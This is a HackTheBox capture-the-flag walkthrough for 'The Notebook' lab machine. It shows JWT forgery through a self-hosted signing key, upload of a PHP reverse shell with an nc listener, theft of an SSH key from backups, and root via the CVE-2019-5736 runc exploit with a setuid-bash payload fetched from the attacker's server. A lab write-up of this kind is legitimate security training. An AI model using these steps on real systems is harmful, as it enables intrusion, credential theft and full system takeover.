# The Notebook

## The Notebook - Hackthebox

OS: Linux 

Difficulty: Medium 

ip: 10.10.10.230

### Nmap

```
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack
```

### Web

#### First Page

![](https://user-images.githubusercontent.com/53917092/114756314-fd624900-9d30-11eb-99c4-8cff2b74c127.png)

creating an account

![](https://user-images.githubusercontent.com/53917092/114757169-e708bd00-9d31-11eb-9d74-d11784dfe591.png)

![](https://user-images.githubusercontent.com/53917092/114757247-fc7de700-9d31-11eb-9838-dd3e660a01b8.png)

![](https://user-images.githubusercontent.com/53917092/114757280-04d62200-9d32-11eb-8658-3feb00c2ff4d.png)

adding a new note

![](https://user-images.githubusercontent.com/53917092/114757326-16b7c500-9d32-11eb-81b8-9caf506fba23.png)

looking at cookies

> auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Imh0dHA6Ly9sb2NhbGhvc3Q6NzA3MC9wcml2S2V5LmtleSJ9.eyJ1c2VybmFtZSI6ImEiLCJlbWFpbCI6ImFAYS5jIiwiYWRtaW5fY2FwIjowfQ.X4xL9bF3x0l8Lclj9hIIUa\_HxJcTUvKSh2i\_gH9TyRs4d1rrK2TXR0AxYiJ\_BL5ytJr0VdqQNKunaNobTps4NTOmOZX-hjzugYngjpUo\_dbJsJIXx\_3D49aycKN6qMS7VjrrS8qvZBWU\_Lom3H6w057lFB3ITncrMg4UpaougjNEJbfZChQrDEDGEY01ZJntBOh\_-JiaCUA3uznt9T98j425XObUDCyCaR0VUJF0W8fuKes9cpwehQDcx-0o9Y66aucBcaywz5Ddge96P0NB-l2E8AnJ0P2p8JDOMaoeCX05I8YEoGeEu99ougOfaVWxekP1nvpBPYjplIUxi-dscXShK8zJtqPHAoOzqVsL4SzJvbi\_z8eDUyb5p0CAoUbrxqy44MoJ3JWWER781iemEISTcgUN3Bp\_AlCK23awPR3ikzpz18QJZnHnCGnhJcdxhqFNm93-7jopjIroIGJjKjsV3gVxdqr4kFkoZdrHdpaob47RQd3MU0YfawEk6ZQ7qL2pGX-ZN4LskZ\_83c5ijgch9zdYovLGJ6sfnwhEh91eAIR16Uz5rKDpjCu1zCOlibMZGyMbxml9dBBqiz1apoo99jGVdeYA9JW1iMiLWjmvpGzOkXhRAwT\_OSH3XJ-Hqoj8eSCKY56nJCiDQ0Z5dQyntco01WWOKPYrUi4-HAs

this looks like a jwt

we can try to understand it better by pasting in <https://jwt.io>

![](https://user-images.githubusercontent.com/53917092/114758609-8bd7ca00-9d33-11eb-92bd-ff02d36c70de.png)

we need a rsa-sha256 (4096) key pair to generate our jwt with "admin\_cap=1"

we can use <https://cryptotools.net/rsagen>

![](https://user-images.githubusercontent.com/53917092/114910663-8abaa180-9df4-11eb-9b91-75ecf57fa572.png)

![](https://user-images.githubusercontent.com/53917092/114911340-4bd91b80-9df5-11eb-89b6-da40e96e7c31.png)

now create a file called "privKey.key" with the same private key that we will use to generate the jwt. Then in the jwt header change "localhost" to your ip, so it will compare the jwt key with the key on your machine. Now we can simply change the "admin\_cap" to 1 and we have a valid cookie (jwt) with admin permission

![](https://user-images.githubusercontent.com/53917092/114913248-5d232780-9df7-11eb-9917-5199759d2506.png)

> python3 -m http.server

![](https://user-images.githubusercontent.com/53917092/114913405-880d7b80-9df7-11eb-8a85-e45904903fd0.png)

put this jwt in your browser cookie and reload the page

now we can see the "admin panel" tab

![](https://user-images.githubusercontent.com/53917092/114914308-855f5600-9df8-11eb-87c6-8b93902cafb4.png)

we can upload files and view the notes

![](https://user-images.githubusercontent.com/53917092/114914461-afb11380-9df8-11eb-815a-e63121ef6d02.png)

checking out "need to fix config"

![](https://user-images.githubusercontent.com/53917092/114914541-cce5e200-9df8-11eb-8995-416cbd17e402.png)

this means we can get shell uploading a php reverse shell

so i used the one from pentest monkey

download the shell

> curl <https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php> -o rev.php

edit the shell putting your ip

![](https://user-images.githubusercontent.com/53917092/114915193-a8d6d080-9df9-11eb-8010-9bfebd01ca83.png)

start a listener

> nc -lvnp 1234

and upload this php

![](https://user-images.githubusercontent.com/53917092/114915535-0d922b00-9dfa-11eb-8a86-4b3222ac87fc.png)

click "view"

and we got shell

**getting tty**

> python3 -c 'import pty;pty.spawn("/bin/bash")'

CTRL+Z

> stty raw -echo;fg

> export TERM=xterm

## User

in /var/backups we have some interesting files,

```
www-data@thenotebook:/tmp$ ls -la /var/backups
total 696
drwxr-xr-x  2 root root     4096 Apr 15 06:26 .
drwxr-xr-x 14 root root     4096 Feb 12 06:52 ..
-rw-r--r--  1 root root    51200 Apr 15 06:25 alternatives.tar.0
-rw-r--r--  1 root root    33252 Feb 24 08:53 apt.extended_states.0
-rw-r--r--  1 root root     3609 Feb 23 08:58 apt.extended_states.1.gz
-rw-r--r--  1 root root     3621 Feb 12 06:52 apt.extended_states.2.gz
-rw-r--r--  1 root root      437 Feb 12 06:17 dpkg.diversions.0
-rw-r--r--  1 root root      172 Feb 12 06:52 dpkg.statoverride.0
-rw-r--r--  1 root root   571460 Feb 24 08:53 dpkg.status.0
-rw-------  1 root root      693 Feb 17 13:18 group.bak
-rw-------  1 root shadow    575 Feb 17 13:18 gshadow.bak
-rw-r--r--  1 root root     4373 Feb 17 09:02 home.tar.gz
-rw-------  1 root root     1555 Feb 12 06:24 passwd.bak
-rw-------  1 root shadow   1024 Feb 12 07:33 shadow.bak
```

so I created a directory inside /tmp/ and extracted these files to my directory

> cd /tmp

> mkdir a; cd a

> tax -xf /var/backups/home.tar.gz

so inside the home file (/var/backups/home.tar.gz) we have the ssh private key from "noah" user

> cd /home/noah/.ssh

> cat id\_rsa

copy the content to a file in your machine and log in as noah with this key

> ssh -i id\_rsa noah\@10.10.10.230

## Privesc

> sudo -l

```
Matching Defaults entries for noah on thenotebook:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User noah may run the following commands on thenotebook:
    (ALL) NOPASSWD: /usr/bin/docker exec -it webapp-dev01*
```

ok we can run this command (/usr/bin/docker exec -it webapp-dev01\*) with any parameter as root without password, so we will use that to become root

#### Docker version

> docker -v

```
Docker version 18.06.0-ce, build 0ffa825
```

searching for this version vulnerabilites

![](https://user-images.githubusercontent.com/53917092/115036274-bf396680-9ea3-11eb-85de-85166770c936.png)

we can try to use one of these exploit, but we need runc, so let's check if runc exists in the target machine

> which runc

```
/usr/sbin/runc
```

> runc -v

```
runc version 1.0.0~rc6+dfsg1
commit: 1.0.0~rc6+dfsg1-3
spec: 1.0.1
```

the runc is in the exact version to run the exploits, let's run it

[video to follow](https://www.youtube.com/watch?v=gjvsbcAlQl8])

in target machine run this to enter in the docker container

> sudo /usr/bin/docker exec -it webapp-dev01 /bin/bash

in our machine download the exploit from <https://github.com/Frichetten/CVE-2019-5736-PoC>

> curl <https://raw.githubusercontent.com/Frichetten/CVE-2019-5736-PoC/master/main.go> -o main.go

change the payload

![](https://user-images.githubusercontent.com/53917092/115038782-3e2f9e80-9ea6-11eb-9a90-e06f0905e05b.png)

in this case, I changed the payload to

> \#!/bin/bash \n chmod +s /bin/bash

because this turn bash runnable as root without password

now build the exploit

> go build main.go

start a python3 http server

> python3 -m http.server

on container install the exploit

> curl http\://\<your\_ip>:8000/main -o exploit

> chmod +x exploit

> ./exploit

in another terminal connect the ssh again and run

> sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh

after the message

> 'No help topic for '/bin/sh''

run

> bash -p

and now we are root

> cat /root/root.txt